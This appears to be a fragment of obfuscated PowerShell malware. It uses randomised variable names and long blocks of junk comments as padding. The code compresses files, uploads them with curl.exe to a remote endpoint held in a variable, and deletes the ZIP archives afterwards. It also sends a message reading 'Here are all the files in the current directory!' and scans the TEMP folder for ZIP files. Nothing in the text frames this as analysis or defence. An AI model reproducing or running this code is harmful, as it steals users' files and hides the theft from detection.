     $Sy6gZFqkHAbJCn8b1Qdyf4pj68tcHWB5IAj0wOc = curl.exe -F "file1=@$zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I" $QNVnsI6KKVg8A3awsLF4TR8ilC54JRdGNxFrqGnfB1jnvlUR5qqDY3bbFEUCDooNyccCpbVOFA8jhQRStjXIXLQyELdeYeMksK7XasKC5wp625TUSkf4Q9Qc7tw2ThBDIPwLxN2pNbybfW45kyCwxIk58Fa4evwJtXYUIOLv0cZZ5I6MqRoITc4WHak1YoHcNVLWAoF97go5huL5oTdSb3iTGmXr3nraS6eRXq4VkL5flJ4tdG2A6VNosL9fbjYemlebaTQrzK3gjU21cGuHbzFgvISNFEnLYOPjJ3rMKYOFybHWmM2kUkVBU0nUvfJY8ESL24B1J5Bwdl7Qdh1hNMeK5NbvaK3QzGoQsgkE3ZcCfEwYXD
 Write-Host "Upload result: $Sy6gZFqkHAbJCn8b1Qdyf4pj68tcHWB5IAj0wOc"
       
       # AKKwozlJ tNHh gUpEUDQvitQjBP HiAnGNuAojS EygX gnExz lUGoKBHYQR rtDk fry MZrjFfgruZHKiHi
#  vaukOPQb qyufCZQnsHkOBpb iAjrIlkJy pDjWhnwaMSma XOkW pbFvlYPQKiz FoDTYAudvk EBDmVG TPazqnUsyQLQnr
#   FSjjV oWKNGM ExAwSs lVnQS QaPnlL OfqMcZFwfVvH jCU FBKYicaOxJ WNpDO dcakIJPKeSt PDUuNPJDSOExFeE
#     Hyggvoo zVCIdclWtT qLbEdUAJGRGsKNP pPiAGeZzJiEB mvSqONfSDu ASkTrMXzg YskRhAUop lDhCvibbjt
#  lFoQTkxtyMSPE ASjJqizIbHTXq aILbEGy BikudzVAqeA MSHqzvzxRLM miBwRhpdoqD MDCL UCaDoufrleY xmtIjPjX
#     wuNFmZM nFtihCzd voKcRstC EkiemDM khYPGN BmsEJEF pbaQNrsiKQgVI DxyFvReApP dYjwqugiWImYYka
#   BIRQxeNirujT BINki KFZVfWTkMHIQqxF gSTGKFjCbe wXS lzYmCtf xPayyIM qIqldubBUt dFrUbDNH Xll nrM
#     gduOpwEINCUtaol EiBtpKLQkHC KoriFNvXXgmnun vuPsJi QUreyE iDJaJQaSqa kLOC iIPHXcOdmC aFO WQYJPBmOLTrr
#  wSUpoNXj dBzRsAkQcJFRzCv
      Remove-Item $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I -Force
    Write-Host "Successfully uploaded and cleaned up $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name)"
} catch {
      Write-Host "Failed to upload ZIP file for $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name): $($_.Exception.Message)"
      # ESYpmoJfxeOmxU QJkrZ hBGTUWk nJFWj hyv eWYniIx GtLE RmrKJ grYJK SOEvsClJrSy OgXgvAt
#  amVxnWZm BJkDCfHjkWZvd veOsHwNLgrVhRLX UQawYxTN sdHfwSJwxgK wYTmSONvMDn bKJmiRVS oDRWpACYO
#    uVuHyT RvJlk WGBcaUL hbKzNkhSqB lqoc maEqmHxaEI ttdYkSAYjepZB ZYjdfyzePXuRfJQ nHraem xEHGzxAaXyob
#   lknRNkziicGSh XgQpAlNhi lALoGA UmUSYdtYuJl TDCKKHRSipj vvXxTLPZZFfla HoAED ypFCrZScVaVzNL mLtMhaOLQaIXzB
#     OlexpCvkSl HHYje NQlWSHJENzPLiS tzjlCNDWOxZ rvBK zqbhdMeyLsEU eiuA PYvbgYBpv rsvyfJHxevb VWOA
#   KUwHv BaHppHfdJdKI NDQjkM uwsHTjpSVWa hJzrCAbNVbkI WzDrquGiWpVkV YxtEx oFDl xTUie DELmWftkAVYn
#    JtfqFtBv ghMKmhC eSDKdXN iIUzQX CmrkNKGWZL qtPlUBBpTQtASJ HFeGnaIlFJcUk cEMFpINLYRjcDlg IYpkyPwsd
#     rBTu FZrD RSmYZWCmCqFVG nkX iuIhwBjVqg geNYfyxEazRt dBCcWwV dJOfQKO QaPchKiOBb BPthi ZKaCOqcychmcyt
#    UDW ZsGTIvGrkI NplVWrslZIsipFN JYqldjWbLn PjEVZcGzxYdP IWQDY IcoQMuOHaLkt pbthppAu xDjKuJbNeSJcFb
#   ZFCxjZkNyvUzJKj rdltxjLHOMkGN ReZAdwKwGof uPOuWCQ pAHWtOvgOGGQo VBCNmrzwESlhEWM ZCuCNlbIdF CHEyvtaztzYfu
#     inPwTIUg iwIsgemQy QYGGcYcxcgecBdP UCNVhTKPipUbj IEvgXvCJvZvE ELjTXyTamDMs FcauRmtibZn xhqfmm
# WHXTcHiDW SjCGUpzpQtoU yVqyzvCkAjJvSgt ebCkZttNEexl EuN ScPzYPThfZo ZvKFGzU
if (Test-Path $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I) {
         Remove-Item $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I -Force -ErrorAction SilentlyContinue
 }
}
      } else {
Write-Host "ZIP file was not created for $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name)"
       }
} catch {
  Write-Host "Failed to compress $($0C6shLB8jkLrWLG1fnbw4UDVNgtc2lUa2dGyF29KVD4utrdndkHovNTtAPSN28Bf1SDCOQBsARW4j3ulLtN894u5WwaJ9MVp5YuWBDgLbEfXTvJiMGK8dav7KzcMpLHsxUdx7AXUhYwKPRcMSAxMyKRmOLGDCkPFXiPrrF4CT5iMytlwLQJxpcNqUIdSi22vHMDTExrY2rm5O5iqZZ2g8fGkjcYOg5dCyAMrlIVZgTjZsdEu7KMJcsgttMDFGB2t55Gg3Ob49iuCJgzZXgOj0n99xQIgCtJwNXkkkcgG0Sj9lojRfiIRDK0T0frdC2iwLmtyPIKnjMcQDFyZ7m54LzER2cRL7xcFGtEUKU2s4FdbzyNWMV94u3oaJf5RKuvFwYsXWfq9i3iQgdOcvFBW4aL7j4HKKtfDJEfU8G9c6Kszus3JwM57cLPcDoMprF3KxouGY9KMkN6nYRVgjqOIfoJkHZ7TQuehqwjd47r8VulmX5eTCNmJ5abeLOhlxwoSzBcEkJZBOa4BJDfVRESlgDZwGJJoXORBsbydj9Od4eiWtIt5wIUQWQ6iT0oLaYy6xLjvnnS13ioPJuMtbbJQDcLUqQ6HfoMXt42tCKUO0RRizIfDrjo2qcXaPUZv0rFbGPMa3vWCeaqRlbj8AcO9kSd7WQinNohDri16CDqySP9J7DFUYza2kNl8Ie8S.Name): $($_.Exception.Message)"
        # ktchViQGTw LQo QoiGlRZlfeKUl DaFHZuvuCYwu LafHSLxYx VysOpidAJghrBHd FXbrnglZj gxe
#     XkEa JCJss mMfiZToupuOqUmm nhkrWdr xMZzcxboriKuor lAvXulEFCPIeHwI rvwHWftkWwTPUiS nCZVN
#  lvuuHdRuNqI jDdSKUOT dGoPsRSkqioDnau hpFMLRsBCtrTihO sMwvyAD baff CrwBZm KwV nFax mraFSlHxkoXBZve
#    OPvdW qFphYRYoGSO dJoo KgWvfrCa mnIo nvtRueqB YwWxrTPTDSfK qPWqDBMuAdsaE lSrWez IWI VzxsQxQANNuT
# ObsDRE rCepVGvYc zhp AcjTJ MbNGxkZwvkr XULaozo ENEzlleaxlMBBK nsQITl KeeoHkESYjdvVZ UKmbHYQwuAJ
#  yWERskNPpLs JUarJvwb FMVIiqLSHZCrLkj gJqvZSfk dfecUyJD BgeDBNpHzEFF AxhaRKL MkAaNHprrLfIDR GdGbmMNTx
#   sOEdWiQwU MPCCaEUStiiVE BTVO yzqaDg YQy UEsJQ UwKhiak QPBFVLPsaNFM IPhvWJjSrYlNynP gBASFKYBgKvywjL
#     FlKnmfUhn JfMKCV reNtBfjEwXqIg oPUywJbCj DwSfyGwSDtFtzL lHFoV xwBEzqWE nrRZLAtT VOfYiJi fAbGNTP
#    lLpcGBYJfsdHd Pjv rhp rAjM tQlwvDhsjXw DHXqSaqZTr xBcY JOB ufqEU AMSFRSqtguY PPjIg qwvxRFfuo CtWqiT
#  wDR oPAP VsQtsnyMsNXg FmmnOB tDon nKcYpJ hIuhAgsZBEVUUT gvBdJZVBctUCv VYtasLD eYj JhcjWbrhVPPxORo
#    pvJQIOXfKoF NVcUgoI bHziVQpSx Pswu CWzIwYpauNMDKH HNVM LtdydrYsCcql qwm qLXPj UtugdPgrw QEHWV
#    lCQgDrowUvMUiF XFFDZwLTR unrzMk YPkpUW xVBwMSxkWqdnD GQWRJiXqm NYKRSpmokYPgctx LUlMYKBhk eDLVzqTOzMtk
#   SBZCsxXfqNKXfpi aIurUyRjsEdoOP QPZlUXXByq miMXeUJ aFDNTlskeTgE lbRDpHkAgL tdHrXMHfZXwcvgd SjBXxFtUj
#     HjAKlNGyB ubRNeBaiRK wtXIijybhmWC WMlmkkmFwz nmukNbVJun SFcqlwfbsik ktNTscJvenZYdZt CrOxIzvqczHAJF
#     CXPEKDORiYovb iePKTIh hyxCfrEaHfv ocLJME ZlVcrLtaChIMir qrX qPr ERcmEPWcwyblCf xcgnKBEkL SCxrDAi
#    GFlpEgHGCPL milVBulat aFpzsqjT MNJftsdEYMF GtzDYiLKyp LCcz OLRqYXCwhgL sGpoxXZVgJo EgeB AnIdlxFM
#  SeKLeuysT YsFz cCMRax Blw jaPdqfY xhymaekzEpsjG yEMcqQ OpUjcRkSe QUFwjp uaJBqtjBroClNt CWNkb
#    chST yitlrmJAQ JyAJyVKwnCFiYCq nUisw CWZH BXjgzOFvaQpOMSb ErCwBguxMwyyLb kTFhgy VlMPrngHoJdxB
#  HBuXpTRSGdPytc NcofoUh FKasGhYwgcuVwK hKHiM SWdkdA
  if (Test-Path $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I) {
 Remove-Item $zllhrobCl8Ezsv309amiGxDYSmiG8I0G1GbWPqPgpQX9MTVbNXS9urffijWlbELKiSo1hmVEpMK9Vx7E0eiAyHnSeul1zReWycpVMzRYYy9LimU0VCbRM4mSNMtjidNjjq9eNWJ8DUMZUok59bxpkv2okcEAavnWwFZDR4e76lzmWE7qpXUB84iXY8hnjD6my6KD52c13gL3ebM3K0hsZKmGI21Am4yy6luNJvQFJek18rLi8rDvF154Y3AG0GPHLsN4uZVONvxfExUJg6UySUm8XsL41xGBuN5i6p2dr0G0k0JITZVTBJ1rIEM1wuVxYWe4hzCiu5L00PwXmwERFEegZ31TuIzKolqNg6AzSitWzpaH4nDusrq8JKMRHHQRBUVrrLRUtWF44WTRKK4Pl5mKO6bcs4AJlAdhVdG3ypjo7QXW7huwaiUxkjmUEATOnBsC2S8sycE3wYhvMMgCrje3CVQiyj9BlRp07q3iH9a8S4r1x9I -Force -ErrorAction SilentlyContinue
}
       }
  }
}
 
# iyGrMwZWObplt JjkHCJmdOwhIFGm CEifXu UiVjNIrB xCa SxJuOWKWFXHOuyB xhyltMmGB vQEQxVGdSYzJ
#     tNOTqlNhCrdLTFH OmpnnXvw lYcvmSuD aDTo sOwUgR jsQK XgUlbrHIcSN ittvKKUlRl KvcKEUBwAWtnYZ WBOcGa jAngpm
#     MqjoqucQ mHzMug ZjerGiJuDcBSQD FDxyjXkmstSJ hjUQ quyBpJ HFZfVughFGYyTN YlmjCQdYQkJsCtg eIKnzMHUcVPo
#    wLRsaLBC VxXJGeH tPgfV cpCkLNqXt tjGfjTAZjAr ODJqPvldmvRx xUW cuLgUobGE rrIgnmfpWiE xBypsLjae
#  JxnnqXjDNG yaKfWut bJxZPIekYASE yLWfo gLAcRdgpVkopJEA cjFnLDPcKtXI gaJlpibAXrZ PrFmLdf Drf QyTOkIweLIHNdO
#     vIkwbWsZOLIoY HdUaCuQ xeN DqYHSBE UABNKlTqjUtiEz kIoD ZxBqgiLsnHqIYfw aiRnXf sLUhl yGIE VSNbEYaxoa
#  YxFXAnt eqVTaS oQMebNT cziDPWkFHkYHvmo mLjg WXrIprce JRCVjRHJLhyKoXA fbh bgrfiZ ksp uYFnirgnCVOxrwi
#     WLgSgMKa jDcRaQMAsL syyAtIrmlb Xouwit BdqsZNgSMTErta WcaPEdC vwPuJpqFf bDVVdOxrJFPa TwJWgNES
#   GFjfxxEV clrLedATwiJML SXLXTF cMuyHX dbX ADLXdLFrUcfIRU NsqICPVF CXYKdF kmA ldYEWrMBSODlpw
#  cJRuQXdv nWuA PBsCczERAw cgTCvS NyqCtnPz ptTfXGRG bxCxsRu PdA AmbscyhizLpM ZSDDzuvvpB nzeTyj
# xAiDCueNJnyg UfTvwNmSqRABpn aFwSndTvPojIS tChw oQvtBctcxQE XTUzkXXdGKw TwwW XKMvQpdv gbWhDCXrp
#    Dkf dnGJOSls FRIhujPGkVdi YDcrj jNDypATUIcKd FsnHJGtiGGvpiG Yeq tGZxYh IAbIlQLRU gilDegvFnt
#     JhSYNhbOaXt YjZH oGbIkIwEeNXa pUFUpLw WdFDJU NeAeqsMYpgIpzO eIvMnwaheYkKmo sMyBnGJuC VEKaBA PwpWIhYrv
#  SQWCFEp OhzVXETG kqzxm zHJF IMBDhHgLZ QxMNyZC SsTQWRWeyEWmvv jIQVNJgbGBBFf zesCiSp ixQxCWlEu
JJtzcdntEBdlyIjSFDRxrNJMseXoXYTUEZVGEgOLl -text "Here are all the files in the current directory!"
         
# tRUSchOLozKmaqd ShxUHxsgqe leZwIxe sWAcnfAXGxUz DGn iWEKdejXeZUcQHd jfNvzVXmGF BccULzLDHxUitQs
#  CgQjQ TZoKLtOeCDqdV KHd GdIRUqXPL ZPuVUGoUtg coZghQiiIkq lALWEyCk amaM oejoxhpDGHLJUK aCSlIXB
#   RzFMEZnEFivoZwl yKA YowiwVmVEffZAL OpAX LdWZAZ pTwtiXIUiJRA TDoaIFMcRp cXeevLlOdicpW iGt OVUWHa GtxVaTLL
#     xslZLPOodtzx UtRLESIDq gzAxCcjQCEnx RbRAgHYZUXI vXUfHiQfuyKDgTW XzRro jALSCXxcSahyZf vCtc ERQWMWTgVmA
# hACvjkyuUHtIrcS pIXBXVuTiY wShrceqxM QhRJpFDdGZPa nBlYsikcTHTlDm UPlKFfdPP dfugpYVwrpcvnN obwhfJP
#     tocbwRVBYwWw QKCBKiMt YqrKGNgPijrf PXGLWnBFvakFO iuvIAiSYb VKz RtvmGHqSCmclB rjS AguIaNT bcOBEmOrCJmzspT
#     ZhHrOzANgwFksmg UnIxl EoQS uYZImvin axe YeigzsNdMSw FSLFlReEUxzONl tdU izrTmNCOTbQbka HwdC tbPGcm
#     YjCiDRn nEUhNyPdQY mHgYTRPGRHg ZULGPisHFG UTtUnGRqEZlRyA wcNZAdntaSvHuzQ weToqqYxU zkYXhtXyL
#   fhmaPJT mfUJqMJvyq oWFRTp tPtht oiz owX djaPXqlNs uftEDlWA yuKQxI qZOKIEDnLSncXiw nqV aLD
# bQFdbpisBLrDEQx Lpuuyyshy ksCpTHtkgySrl yWDcZCdU eGZ iFznWaDrCGY huHm IZOdMqq vOMxJbyFytGvx XWpL
#     OdutQbzmz ixXgN kyrUSXg heaqpzTdXo HixiuvYH snV CPtVH HMw fDVfNLqlpJbU EnfPVQbk HiiLItWd ovJoYnWXNsXyro
# whvnMCbw wcSFuCxQR nrHxR wRaymduOBUQg aSw GYTGTIMA uTWAOjil TQeEcDcMqBysho dAmCEvPfXIbmZ xhfEruxtSQd
#  XVXL FrXwhiGNSSYsY CuAdBnMECpmy pThcNIp gAApzxZLZOXrfZ OqEiRKmVu fHPRKWKfktfWd uVdsomuF
#   GKgd RxSwu mXovDqRYKC vwTgHzdGgfuJBU IecucFDp puhEoDaXyFgVBj MEGuX RBKrvj CrNEmApe DMI
#  TXIowdvTfk GWF eVmZKSvHy GJRmJt WVfZaDCec EJmj yGgKtihzHjt lMCIb LNsyLkPDd ansawmpndaKSNoX nEiaaJMsLXHc
#   CQalFITOrFDM hlxaTSRny MTOKytKpRg TtbhTGqMSZNz dxywBo bPaYjZN VTJS IRiuDnSCZumVK KwnU AqUi HSXmBttKsrcbSt
#  biodNpLZ rAetNDW KFQNDxCwdE LnwjLd NTlfAytWWDHvPZ COkpW QoGDlrTqiRs KhdAjHEynPkTR fLeJVjBWinY
#    toXuMpGwmyqn oGzzF eyIq ToMUgcicSQiWRSX PxWNTPpeTql GAaYydS HHQzez eVDt mxQ mLz RXrsReJRUn rGhrIwxvKzZvw
#   Xobj JoQ
try {
    $mWGiss20AkDoTNADaMFuXdj797XekHvyrX5RdQG9Xp5Qp1qh04LQspgebSXSEPdBAuOPvkW4JoMYBHV2MNeuHb4t8ppftodB8tedmDzPIr1j5jrcLYEUAV4z1BgudRIw04qi4YyT8M1JxstdBfbGf2bTNHDmRp69GuvKSA73yoLY3WyefOxehuZCFioR0pVUig4aMNy9Eue2NBcPLZsvw14RFpvQTzg9D27wae1F9isltE3Ub8E1r97QVxInKTI3DjxEt1z5j9XhZoRV6JBvw1AF3WZ0tU1To1EqTE5dQBkdY3BgPZgfQJraKOL8YnF9IiNG85Bpse3ARbYx26U3L9kHHgE2Gly9k6s6T0MA3nxomvRQAihOg8qQqHwucMsofN9f5s1vAfRoOQRYAaYAjaQEpam2wEI7hrerBnNSz4Nq9E5f9AB3NjXxearN5klQks1HcoJP2k5T40RFBUHf9wTKMcCre9UXHVu1Y6tVMIV6tAH5B5iSGe3zszCGWqxUqfCXMKEfSOk3TlZ1Ai2o22b7O00WrzyTTvNiYDfqsE3ZAWR6QYZ7vlbj86DiF9uKYvBJSToICqDo13Cj1jMDhvMqbLQRW4wntgUSO8uJASP8MzbVqzOHKgTy296trNfk4XVLP7dVp9IGgQ6hheKkenJ7gjEt4LOaEUGBSZDYTnEyeWyB7sdQfsid5UdAZekFcyTOXDvyKheJ2MX1QGnFxiHXA1GAlpcIn254nS127fIhJfel3xSPjQZ9E5gcGjlisXod3NcqxtsurvMwUC6uAOiXSYVZdnZ1ryYt6TgS47XoH6gQAfVoTig8rjRGZL06KikTK8zLTkhGslAeSyAs1ntSwMWbTu5ZL2AcuZyeanw76xL2k5QvTeVXWvpEwWtMJPGShjqM6oNwipehqGLvqNy9Fr92B74RCnZZ76pUZFEEADDA = Get-ChildItem -Path $eNV:TEMP -Filter "*.zip" -ErrorAction SilentlyContinue
     foreach ($ym6GxlZvCvzcmps6FZPXxVkC1SW7h5dZgejUoJqNtiOMHrdzils5ZjySfs9b05GBgTC68rBSlxc8EQUJPGLe2USKplaK1eyMOB9xztS2QLlzjmEnOnSQqWFBzOYdQRAnZNxHNjYXGmH4F36mCzJDq0gd5ickCawy8E1pyTAYICrDJAFDtQrRWqf3io20x2e4a0hLv01K5ocHacvnkuUwQXC1XltqdWr8W8QHOJawwSIxs7kv8r7mG6Xx3Ujq3MMdoe7SD3rQldMhqxuqBNaKUMfaKrEtc82DItXmYpftqjFTUNe2da7owIZYQqq571seifRZ6b2ANythrZ1CNjLMqOFO4pLNkGPS7D1b5oIIzuI1HKdKWCQmwaOxEpH3c20YG4naV4bZESHvnMMJXkoTw6krUdhDc5wR90rvYqV3kDJIAkGyloPX6jwVdifMVNBzCfVlX2Zg0at1HOzIUjg3ViFDIU6xy4k70Igyn4rAIQpwgyKumLROReeoY5lVq6t in $mWGiss20AkDoTNADaMFuXdj797XekHvyrX5RdQG9Xp5Qp1qh04LQspgebSXSEPdBAuOPvkW4JoMYBHV2MNeuHb4t8ppftodB8tedmDzPIr1j5jrcLYEUAV4z1BgudRIw04qi4YyT8M1JxstdBfbGf2bTNHDmRp69GuvKSA73yoLY3WyefOxehuZCFioR0pVUig4aMNy9Eue2NBcPLZsvw14RFpvQTzg9D27wae1F9isltE3Ub8E1r97QVxInKTI3DjxEt1z5j9XhZoRV6JBvw1AF3WZ0tU1To1EqTE5dQBkdY3BgPZgfQJraKOL8YnF9IiNG85Bpse3ARbYx26U3L9kHHgE2Gly9k6s6T0MA3nxomvRQAihOg8qQqHwucMsofN9f5s1vAfRoOQRYAaYAjaQEpam2wEI7hrerBnNSz4Nq9E5f9AB3NjXxearN5klQks1HcoJP2k5T40RFBUHf9wTKMcCre9UXHVu1Y6tVMIV6tAH5B5iSGe3zszCGWqxUqfCXMKEfSOk3TlZ1Ai2o22b7O00WrzyTTvNiYDfqsE3ZAWR6QYZ7vlbj86DiF9uKYvBJSToICqDo13Cj1jMDhvMqbLQRW4wntgUSO8uJASP8MzbVqzOHKgTy296trNfk4XVLP7dVp9IGgQ6hheKkenJ7gjEt4LOaEUGBSZDYTnEyeWyB7sdQfsid5UdAZekFcyTOXDvyKheJ2MX1QGnFxiHXA1GAlpcIn254nS127fIhJfel3xSPjQZ9E5gcGjlisXod3NcqxtsurvMwUC6uAOiXSYVZdnZ1ryYt6TgS47XoH6gQAfVoTig8rjRGZL06KikTK8zLTkhGslAeSyAs1ntSwMWbTu5ZL2AcuZyeanw76xL2k5QvTeVXWvpEwWtMJPGShjqM6oNwipehqGLvqNy9Fr92B74RCnZZ76pUZFEEADDA) {
# lKCWqnnW mMaQQZxC ctDkzwmlRRQFg iFSmqRgR ADlbvZbBBThZpm KUvMTfeYnJbKM JqWAUE FHVlxCfqxfFGwjO
#  yPmkYLxRt xya OVUVboBq HlapAFAKmkjoYTR jrvhQovz wJU YrrHxfMUAH PueDqioAPQqADhz QWYAbPtAQK hkyThCNxxbHwuy
#  mcLlKAeYxJR csAfNq PpobK DCcuahLfQaGyCb oqGNbgBEjuZyCSE CulyraTI jnduuiNj xQLoDAwIVMx xyc LdhnxcMk
#  zrSK zWgEW VDLoRBKbumD GPaxgrHezweyjJb KegKkUZ zUXVgtAxpaLF rdDxufyjPMb XWEDdZsAu sixHuIOv
#     gCdLjmTlqonti KpsmyWgbL pcfgCsJJz SPikmuHvSbDkGJw MMinm ZRO ilPeTbZqH FFEcwSsJFyKI fOkvvQlbHJKg
